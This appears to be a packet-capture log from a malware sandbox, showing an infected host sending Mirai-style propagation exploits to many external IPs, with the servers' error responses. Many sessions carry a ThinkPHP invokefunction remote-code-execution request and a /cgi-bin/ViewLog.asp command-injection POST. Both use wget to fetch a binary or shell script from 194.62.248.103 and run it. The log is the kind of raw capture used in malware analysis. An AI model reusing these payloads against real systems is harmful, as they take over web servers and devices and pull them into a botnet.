                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        953192.168.2.235943088.218.158.10280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.564158916 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:21.886732101 CEST516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Thu, 21 Feb 2019 15:47:04 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                                        Apr 14, 2024 16:37:22.083120108 CEST516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Thu, 21 Feb 2019 15:47:04 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        954192.168.2.235944288.218.158.10280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.857470036 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:22.181766033 CEST516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Thu, 21 Feb 2019 15:47:04 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                                        Apr 14, 2024 16:37:22.372787952 CEST516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Thu, 21 Feb 2019 15:47:04 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        955192.168.2.235952295.216.169.20080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:22.500041008 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:22.820852995 CEST355INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:37:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 182
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        956192.168.2.234954695.65.86.15580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:22.506583929 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:22.834969997 CEST275INHTTP/1.1 505 HTTP Version not supported
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 140
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        957192.168.2.234092494.121.60.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:23.215095997 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        958192.168.2.235799031.121.191.2268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:23.504650116 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:23.794888973 CEST659INHTTP/1.0 404 Not Found !!!
                                                        Pragma: no-cache
                                                        Content-type: text/html
                                                        <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        959192.168.2.235936294.249.235.1298080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:23.516943932 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:23.822289944 CEST259INHTTP/1.1 404 Not Found
                                                        Server: WebServer
                                                        Date: Sun, 14 Apr 2024 14:36:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 110
                                                        Connection: close
                                                        Data Raw: 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a
                                                        Data Ascii: <title>404 Not Found</title><h1>404 Not Found</h1>The resource requested could not be found on this server.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        960192.168.2.234522894.120.234.2558080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:23.551628113 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        961192.168.2.234059094.71.35.2098080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:23.554290056 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        962192.168.2.234912894.123.20.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:23.555010080 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        963192.168.2.233382294.242.50.638080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:23.555692911 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:23.896625042 CEST451INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:23 GMT
                                                        Server: Apache/2.4.54 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1f
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        964192.168.2.233837894.120.243.1868080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:23.559699059 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        965192.168.2.234018695.101.43.7880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.159045935 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:24.470755100 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:37:24 GMT
                                                        Date: Sun, 14 Apr 2024 14:37:24 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 38 63 39 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 34 34 34 26 23 34 36 3b 31 30 38 35 62 35 34 39 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 39 38 63 39 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 34 34 34 26 23 34 36 3b 31 30 38 35 62 35 34 39 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;98c91002&#46;1713105444&#46;1085b549<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;98c91002&#46;1713105444&#46;1085b549</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        966192.168.2.235783295.101.16.4780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.164343119 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:24.481153965 CEST583INHTTP/1.0 400 Bad Request
